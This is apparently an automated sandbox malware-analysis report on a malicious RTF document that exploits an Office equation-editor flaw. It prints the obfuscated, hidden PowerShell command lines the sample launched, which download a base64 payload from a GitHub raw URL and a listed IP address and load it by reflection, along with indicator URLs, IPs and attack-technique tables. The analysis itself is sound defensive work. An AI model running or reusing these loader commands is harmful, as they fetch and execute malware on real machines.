Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )"Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrftly6y29tc3bfy1s0lde1ldi1xs1qt0lojycpicgoj0lichunkydybccrjya9igd6smh0dhbzoicrjy8vjysncmf3licrj2dpdgh1ynvzzxinkydjb250jysnzw50lmnvbs9ob0rldgvjjysndccrj09ul05vrccrj2v0zwn0tycrj24nkycvcmunkydmcycrjy9ozscrj2fkcy9tjysnywknkydulycrj0rljysndgfotm90jysnac1wlicrj3r4jysndgcnkyd6sjsgswinkydwymfzzty0jysnq29ujysndgvudca9jysnichozxcnkyctjysnt2jqjysnzwn0ifmnkyd5c3qnkydlbs5ozxqnkycuv2vijysnq2xpzw50ks5eb3dujysnbg8nkydhzfmnkyd0cmlujysnzycrjyhjynb1cmwnkycpoybjynbiaw5hcnknkyddb250zw50id0gjysnwycrj1n5jysnc3rlbs5db252zxj0xto6rnjvjysnbuinkydhc2u2nccrj1n0cmlujysnzyhjynbijysnyscrj3nlnjrdbycrj250zw50jysnktsgswjwyxnzzw1ibccrj3kgpsankydbuicrj2unkydmbccrj2vjdglvbicrjy5bc3nlbwjsev0nkyc6okxvywqoswjwymluyxj5jysnqycrj28nkydudgvudck7iftkbmxpyi5jty5ib21lxtonkyc6vkfjkha3anr4dc5wrycrj0zsui8wmdevmdinkycumdiyljmumjknkycxjysnly8nkyc6chr0ahankyc3aiwnkycgcdcnkydqzgvzyxrpdmfkb3a3aiwgcccrjzdqzgunkydzyxrpdicrj2fkb3a3aiwnkycgcdcnkydqzgvzyxrpdmfkbycrj3a3aicrjywgcddqumvnqxntjysncddqjysnlcbwnycrj2pwn2oscdcnkydqcddqkscplljlcgxhq2uoj2d6sicsw1nuukluz11bq2hhul0zoskuumvwbgfdzsgncddqjyxbu1rssw5nxvtdagfsxtm0ks5szxbsyunlkcdjynanlcckjykgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'') (('ibpu'+'rl'+' = gzjhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/nodetec'+'t'+'on/nod'+'etecto'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'de'+'tahnot'+'h-v.'+'tx'+'tg'+'zj; ib'+'pbase64'+'con'+'tent ='+' (new'+'-'+'obj'+'ect s'+'yst'+'em.net'+'.web'+'client).down'+'lo'+'ads'+'trin'+'g'+'(ibpurl'+'); ibpbinary'+'content = '+'['+'sy'+'stem.convert]::fro'+'mb'+'ase64'+'strin'+'g(ibpb'+'a'+'se64co'+'ntent'+'); ibpassembl'+'y = '+'[r'+'e'+'fl'+'ection'+'.assembly]'+'::load(ibpbinary'+'c'+'o'+'ntent); [dnlib.io.home]:'+':vai(p7jtxt.vg'+'frr/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jregasm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').replace('gzj',[string][char]39).replace('p7j',[string][char]34).replace('ibp','$') )"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrftly6y29tc3bfy1s0lde1ldi1xs1qt0lojycpicgoj0lichunkydybccrjya9igd6smh0dhbzoicrjy8vjysncmf3licrj2dpdgh1ynvzzxinkydjb250jysnzw50lmnvbs9ob0rldgvjjysndccrj09ul05vrccrj2v0zwn0tycrj24nkycvcmunkydmcycrjy9ozscrj2fkcy9tjysnywknkydulycrj0rljysndgfotm90jysnac1wlicrj3r4jysndgcnkyd6sjsgswinkydwymfzzty0jysnq29ujysndgvudca9jysnichozxcnkyctjysnt2jqjysnzwn0ifmnkyd5c3qnkydlbs5ozxqnkycuv2vijysnq2xpzw50ks5eb3dujysnbg8nkydhzfmnkyd0cmlujysnzycrjyhjynb1cmwnkycpoybjynbiaw5hcnknkyddb250zw50id0gjysnwycrj1n5jysnc3rlbs5db252zxj0xto6rnjvjysnbuinkydhc2u2nccrj1n0cmlujysnzyhjynbijysnyscrj3nlnjrdbycrj250zw50jysnktsgswjwyxnzzw1ibccrj3kgpsankydbuicrj2unkydmbccrj2vjdglvbicrjy5bc3nlbwjsev0nkyc6okxvywqoswjwymluyxj5jysnqycrj28nkydudgvudck7iftkbmxpyi5jty5ib21lxtonkyc6vkfjkha3anr4dc5wrycrj0zsui8wmdevmdinkycumdiyljmumjknkycxjysnly8nkyc6chr0ahankyc3aiwnkycgcdcnkydqzgvzyxrpdmfkb3a3aiwgcccrjzdqzgunkydzyxrpdicrj2fkb3a3aiwnkycgcdcnkydqzgvzyxrpdmfkbycrj3a3aicrjywgcddqumvnqxntjysncddqjysnlcbwnycrj2pwn2oscdcnkydqcddqkscplljlcgxhq2uoj2d6sicsw1nuukluz11bq2hhul0zoskuumvwbgfdzsgncddqjyxbu1rssw5nxvtdagfsxtm0ks5szxbsyunlkcdjynanlcckjykgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'') (('ibpu'+'rl'+' = gzjhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/nodetec'+'t'+'on/nod'+'etecto'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'de'+'tahnot'+'h-v.'+'tx'+'tg'+'zj; ib'+'pbase64'+'con'+'tent ='+' (new'+'-'+'obj'+'ect s'+'yst'+'em.net'+'.web'+'client).down'+'lo'+'ads'+'trin'+'g'+'(ibpurl'+'); ibpbinary'+'content = '+'['+'sy'+'stem.convert]::fro'+'mb'+'ase64'+'strin'+'g(ibpb'+'a'+'se64co'+'ntent'+'); ibpassembl'+'y = '+'[r'+'e'+'fl'+'ection'+'.assembly]'+'::load(ibpbinary'+'c'+'o'+'ntent); [dnlib.io.home]:'+':vai(p7jtxt.vg'+'frr/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jregasm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').replace('gzj',[string][char]39).replace('p7j',[string][char]34).replace('ibp','$') )"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting
Valid Accounts111
Command and Scripting Interpreter
111
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts53
Exploitation for Client Execution
1
DLL Side-Loading
1
DLL Side-Loading
1
Modify Registry
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell
Logon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets1
Remote System Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Install Root Certificate
DCSync13
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1526389 Sample: IpEmBW3Qw5.rtf Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 49 Multi AV Scanner detection for domain / URL 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for dropped file 2->53 55 16 other signatures 2->55 9 WINWORD.EXE 336 17 2->9         started        process3 file4 27 C:\Users\...\~WRD0000.tmp:Zone.Identifier, ASCII 9->27 dropped 29 C:\Users\user\Desktop\~WRD0000.tmp, Rich 9->29 dropped 31 C:\Users\user\Desktop\IpEmBW3Qw5.rtf (copy), Rich 9->31 dropped 33 ~WRF{D2609696-E762...C-A86155954B70}.tmp, Composite 9->33 dropped 12 EQNEDT32.EXE 12 9->12         started        process5 dnsIp6 39 192.3.220.20, 49163, 49165, 80 AS-COLOCROSSINGUS United States 12->39 35 C:\...\newprojectwithnewthingstobecom.vBS, Unicode 12->35 dropped 63 Office equation editor establishes network connection 12->63 65 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->65 17 wscript.exe 1 12->17         started        file7 signatures8 process9 signatures10 41 Suspicious powershell command line found 17->41 43 Wscript starts Powershell (via cmd or directly) 17->43 45 Bypasses PowerShell execution policy 17->45 47 2 other signatures 17->47 20 powershell.exe 4 17->20         started        process11 signatures12 57 Suspicious powershell command line found 20->57 59 Obfuscated command line found 20->59 23 powershell.exe 12 5 20->23         started        process13 dnsIp14 37 raw.githubusercontent.com 185.199.109.133, 443, 49164 FASTLYUS Netherlands 23->37 61 Installs new ROOT certificates 23->61 signatures15

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
IpEmBW3Qw5.rtf50%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
IpEmBW3Qw5.rtf63%VirustotalBrowse
IpEmBW3Qw5.rtf100%AviraHEUR/Rtf.Malformed
SourceDetectionScannerLabelLink
C:\Users\user\Desktop\~WRD0000.tmp100%AviraEXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D2609696-E762-447B-A02C-A86155954B70}.tmp100%AviraEXP/CVE-2017-11882.Gen
No Antivirus matches
SourceDetectionScannerLabelLink
raw.githubusercontent.com0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://crl.entrust.net/server1.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://go.micros0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://secure.comodo.com/CPS00%URL Reputationsafe
http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt6%VirustotalBrowse
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtgzJ;2%VirustotalBrowse
http://192.3.220.207%VirustotalBrowse
https://raw.githubusercontent.com0%VirustotalBrowse
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
http://192.3.220.20/100/RRFGV.txt11%VirustotalBrowse
http://192.3.220.20/100/newprojectwithnewthingstobecome.tIF3%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
raw.githubusercontent.com
185.199.109.133
truefalseunknown
NameMaliciousAntivirus DetectionReputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalseunknown
http://192.3.220.20/100/newprojectwithnewthingstobecome.tIFtrueunknown
http://192.3.220.20/100/RRFGV.txttrueunknown
NameSourceMaliciousAntivirus DetectionReputation
http://192.3.220.20powershell.exe, 00000008.00000002.380604266.00000000025D7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.382187322.0000000003369000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtgzJ;powershell.exe, 00000008.00000002.380604266.000000000247A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://crl.entrust.net/server1.crl0powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://ocsp.entrust.net03powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://192.3.220.20/100/newprojectwithnewthingstobecome.tIFvEQNEDT32.EXE, 00000002.00000002.364639582.00000000002A4000.00000004.00000020.00020000.00000000.sdmpfalse
    unknown
    https://contoso.com/Licensepowershell.exe, 00000008.00000002.382187322.0000000003369000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://contoso.com/Iconpowershell.exe, 00000008.00000002.382187322.0000000003369000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    http://192.3.220.20/100/newprojectwithnewthingstobecome.tIFC:EQNEDT32.EXE, 00000002.00000003.364052358.0000000000319000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.364033598.00000000002FB000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://go.microspowershell.exe, 00000008.00000002.380604266.00000000029F3000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpfalseunknown
      https://raw.githubusercontent.compowershell.exe, 00000008.00000002.380604266.000000000247A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
      https://contoso.com/powershell.exe, 00000008.00000002.382187322.0000000003369000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.382187322.0000000003369000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://go.microsoft.cpowershell.exe, 00000008.00000002.380078753.000000000041A000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://192.3.220.20/100/newprojectwithnewthingstobecome.tIFjEQNEDT32.EXE, 00000002.00000002.364639582.00000000002AF000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://ocsp.entrust.net0Dpowershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.386921260.0000000002367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.380604266.0000000002341000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://secure.comodo.com/CPS0powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://192.3.220.20/100/newprojectwithnewthingstobecome.tIFfEQNEDT32.EXE, 00000002.00000002.364639582.00000000002A4000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://crl.entrust.net/2048ca.crl0powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            185.199.109.133
            raw.githubusercontent.comNetherlands
            54113FASTLYUSfalse
            192.3.220.20
            unknownUnited States
            36352AS-COLOCROSSINGUStrue
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1526389
            Start date and time:2024-10-05 14:48:45 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 42s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:11
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:IpEmBW3Qw5.rtf
            renamed because original name is a hash value
            Original Sample Name:85bb9c92d8128e3c8cf070a813b9ba82.rtf
            Detection:MAL
            Classification:mal100.expl.evad.winRTF@8/18@1/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 71%
            • Number of executed functions: 15
            • Number of non-executed functions: 9
            Cookbook Comments:
            • Found application associated with file extension: .rtf
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
            • Execution Graph export aborted for target EQNEDT32.EXE, PID 3344 because there are no executed function
            • Execution Graph export aborted for target powershell.exe, PID 3548 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 3652 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            08:49:38API Interceptor74x Sleep call for process: EQNEDT32.EXE modified
            08:49:42API Interceptor8x Sleep call for process: wscript.exe modified
            08:49:43API Interceptor105x Sleep call for process: powershell.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            185.199.109.133SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
            SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
            192.3.220.20DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
            • 192.3.220.20/97/RFGBVV.txt
            PO-00536.xlsGet hashmaliciousRemcosBrowse
            • 192.3.220.20/100/RRFGV.txt
            Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
            • 192.3.220.20/80/uo/IEnetbookcoookies.hta
            Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
            • 192.3.220.20/80/uo/IEnetbookcoookies.hta
            Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
            • 192.3.220.20/80/uo/IEnetbookcoookies.hta
            DHL Receipt_AWB811070484778.xlsGet hashmaliciousUnknownBrowse
            • 192.3.220.20/350/ne/IEnetbooksCookiess.hta
            DHL Receipt_AWB811070484778.xlsGet hashmaliciousUnknownBrowse
            • 192.3.220.20/350/ne/IEnetbooksCookiess.hta
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            raw.githubusercontent.comfile.exeGet hashmaliciousUnknownBrowse
            • 185.199.110.133
            Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
            • 185.199.111.133
            DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
            • 185.199.111.133
            GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
            • 185.199.108.133
            Swift Copy.xlsGet hashmaliciousUnknownBrowse
            • 185.199.110.133
            SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
            • 185.199.110.133
            PO-00536.xlsGet hashmaliciousRemcosBrowse
            • 185.199.111.133
            Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
            • 185.199.109.133
            FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
            • 185.199.108.133
            PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
            • 185.199.109.133
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            AS-COLOCROSSINGUShttps://extensivetraders.org/Get hashmaliciousUnknownBrowse
            • 75.127.1.122
            DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
            • 192.3.220.20
            Swift Copy.xlsGet hashmaliciousUnknownBrowse
            • 107.172.148.201
            PO-00536.xlsGet hashmaliciousRemcosBrowse
            • 192.3.220.20
            Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
            • 107.172.130.147
            TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
            • 172.245.123.6
            CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
            • 107.175.130.20
            UfsYHroDY1.rtfGet hashmaliciousFormBookBrowse
            • 104.168.7.36
            QT2Q1292300924.xla.xlsxGet hashmaliciousUnknownBrowse
            • 104.168.7.7
            QT2Q1292300924.xla.xlsxGet hashmaliciousUnknownBrowse
            • 104.168.7.7
            FASTLYUSRequest For Quotation.jsGet hashmaliciousSTRRATBrowse
            • 199.232.196.209
            bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
            • 151.101.2.49
            8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
            • 185.199.110.133
            https://cedars-sinai-enterprise.dicomgrid.com/worklist/Get hashmaliciousUnknownBrowse
            • 151.101.129.140
            [MALICIOUS]_Secured_Doc-[yBv-26104].pdfGet hashmaliciousUnknownBrowse
            • 151.101.2.137
            https://clicktracking.yellowbook.com/trackingenginewebapp/tracking.html?MB_ID=256862&SE_ID=9&AG_ID=2952701&AD_ID=6851395&kw=restaurants%20near%20me&kw_type=p&C_ID=874339&SE_AD_ID=73873744870314&se_clk_id=0651300f23401ca1b2e355991fb49377&hibu_site=0&redirect_url=https://www.keybag.nl/image/arull.php?7120797967704b5369323074645079557a504c456e4d53532f4b7a79394c4c556c4e7a73684d7a64644c7a732f564b386a524c366b494364454841413d3dmaggie@proctorlane.comGet hashmaliciousHTMLPhisherBrowse
            • 151.101.66.137
            survey.pdfGet hashmaliciousPDFPhishBrowse
            • 199.232.192.193
            https://href.li/?https://CYT.sprenumen.ru/wJPIeL/#I#Ws-amclean@lwsd.orgGet hashmaliciousTycoon2FABrowse
            • 151.101.2.137
            fa5a527b.emlGet hashmaliciousHTMLPhisherBrowse
            • 151.101.66.137
            https://tw6v8p.uperwint.com/AP2d/#Madvisory@vistra.comGet hashmaliciousUnknownBrowse
            • 151.101.194.137
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            05af1f5ca1b87cc9cc9b25185115607dPO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
            • 185.199.109.133
            DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
            • 185.199.109.133
            GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
            • 185.199.109.133
            Swift Copy.xlsGet hashmaliciousUnknownBrowse
            • 185.199.109.133
            PO-00536.xlsGet hashmaliciousRemcosBrowse
            • 185.199.109.133
            Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
            • 185.199.109.133
            MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 185.199.109.133
            StatementXofXaccount.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 185.199.109.133
            TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
            • 185.199.109.133
            PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
            • 185.199.109.133
            No context
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):4760
            Entropy (8bit):4.834060479684549
            Encrypted:false
